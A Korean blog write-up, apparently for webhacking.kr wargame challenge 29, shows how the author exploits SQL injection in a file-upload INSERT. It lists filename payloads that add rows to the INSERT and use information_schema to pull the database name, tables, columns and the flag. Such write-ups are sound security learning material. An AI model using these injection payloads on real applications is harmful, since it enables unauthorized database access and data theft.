문제를 보면 위와 같이 컬럼으로 보이는 정보를 던져줍니다.
파일을 업로드하면 업로드한 시간, 내 아이피, 파일 이름을 보여줍니다.
여기서 딱히 공격할 곳이 없어서 고민하는 도중 혹시 Insert에서 공격이 가능하지 않을까 해서 여러 시도를 해보았습니다.
위와 같이 공격을 시도한 것은 컬럼의 생김새가 어떻게 생겼을까 계속 고민하다가 잘 때려맞춰서 가능하였습니다.
컬럼 순서는 '파일이름', 타임스탬프(INT), '아이피' 순입니다.
꼬아 놓다니ㅣ... ㅠㅅㅠ...
위와 같이 정보를 막 입력하다보면 나오게 될 것입니다.
공격을 수행했던 코드는 다음과 같습니다.
< TEST를 위한 공격 코드 >
filename="kkamikoontest!!', 1234, '내 아이피 직접 입력')#" |
< DB 정보를 가져오는 공격 코드 >
filename="kkami Dummy', 1234, '내 아이피 입력'),((SELECT database()), 1234, '내 아이피 입력')#" |
filename="kkami Dummy', 1234, '내 아이피 입력'),((SELECT table_name FROM information_schema.tables WHERE table_schema='chall29'), 1234, '내 아이피 입력')#" |
filename="kkami Dummy', 1234, '내 아이피 입력'),((SELECT table_name FROM information_schema.tables limit 1,1), 1234, '내 아이피 입력')#" |
filename="kkami Dummy', 1234, '내 아이피 입력'),((SELECT column_name FROM information_schema.columns where table_name='flag_congratz'), 1234, '내 아이피 입력')#" |
filename="kkami Dummy', 1234, '내 아이피 입력'),((SELECT flag FROM flag_congratz), 1234, '내 아이피 입력')#" |
'WARGAMES > webhacking.kr - old' 카테고리의 다른 글
| Webhacking.kr_No33(200) - old (0) | 2019.12.31 |
|---|---|
| Webhacking.kr_No32(150) - old (0) | 2019.12.31 |
| Webhacking.kr_No31(150) - old (0) | 2019.12.31 |
| Webhacking.kr_No30(550) - old (0) | 2019.12.31 |
| Webhacking.kr_No13(1000) - old (0) | 2019.12.15 |
| Webhacking.kr_No.28(500) - old (0) | 2019.10.25 |
| Webhacking.kr_No.27(150) - old (0) | 2019.10.25 |
| Webhacking.kr_No.26(100) - old (0) | 2019.10.24 |